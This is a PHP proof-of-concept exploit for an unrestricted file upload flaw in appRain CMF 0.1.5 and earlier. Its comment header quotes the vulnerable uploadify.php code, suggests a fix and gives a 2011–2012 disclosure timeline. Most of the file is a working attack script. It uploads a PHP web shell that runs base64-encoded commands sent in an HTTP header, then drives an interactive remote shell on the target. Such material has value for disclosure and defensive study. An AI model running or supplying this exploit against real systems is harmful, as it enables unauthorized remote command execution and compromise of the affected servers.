appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit



<?php


/*
    ---------------------------------------------------------------------
    appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
    ---------------------------------------------------------------------
    
    author............: Egidio Romano aka EgiX
    mail..............: n0b0d13s[at]gmail[dot]com
    software link.....: http://www.apprain.com/
     
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] vulnerable code in /webroot/addons/uploadify/uploadify.php
    
    27.    if (!empty($_FILES)) {
    28.            $tempFile = $_FILES['Filedata']['tmp_name'];
    29.            //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    30.            $targetFile =  "uploads/" . $_FILES['Filedata']['name'];
    31.            
    32.            // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    33.            // $fileTypes  = str_replace(';','|',$fileTypes);
    34.            // $typesArray = split('\|',$fileTypes);
    35.            // $fileParts  = pathinfo($_FILES['Filedata']['name']);
    36.            
    37.            // if (in_array($fileParts['extension'],$typesArray)) {
    38.                    // Uncomment the following line if you want to make the directory if it doesn't exist
    39.                    // mkdir(str_replace('//','/',$targetPath), 0755, true);
    40.                    
    41.                    move_uploaded_file($tempFile,$targetFile);
    42.                    echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
    43.            // } else {
    44.            //      echo 'Invalid file type.';
    45.            // }
    46.    }
    
    Restricted access to  this script isn't properly realized,  so an attacker might  be able to upload
    arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
    
    [-] Possible bug fix:
    
    include_once('../../../app.php');
    App::__Obj('appRain_Base_Core')->check_admin_login(); 
    
    add this lines of code at the beginning of the script
    
    [-] Disclosure timeline:
    
    [19/12/2011] - Vulnerability discovered
    [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135
    [20/12/2011] - Vendor response and fix suggested 
    [16/01/2012] - After four weeks still no fix released
    [19/01/2012] - Public disclosure
    
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout"5);

function 
http_send($host$packet)
{
    if (!(
$sock fsockopen($host80)))
        die(
"\n[-] No response from {$host}:80\n");
 
    
fputs($sock$packet);
    return 
stream_get_contents($sock);
}

print 
"\n+---------------------------------------------------------------+";
print 
"\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";
print 
"\n+---------------------------------------------------------------+\n";
 
if (
$argc 3)
{
    print 
"\nUsage......: php $argv[0] <host> <path>\n";
    print 
"\nExample....: php $argv[0] localhost /";
    print 
"\nExample....: php $argv[0] localhost /apprain-v015/\n";
    die();
}

$host $argv[1];
$path $argv[2];

$payload  "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet  "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
    
if (!
preg_match('/sh.php/'http_send($host$packet))) die("\n[-] Upload failed!\n");

$packet  "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
    
while(
1)
{
    print 
"\napprain-shell# ";
    if ((
$cmd trim(fgets(STDIN))) == "exit") break;
    
$response http_send($hostsprintf($packetbase64_encode($cmd)));
    
preg_match('/___(.*)/s'$response$m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>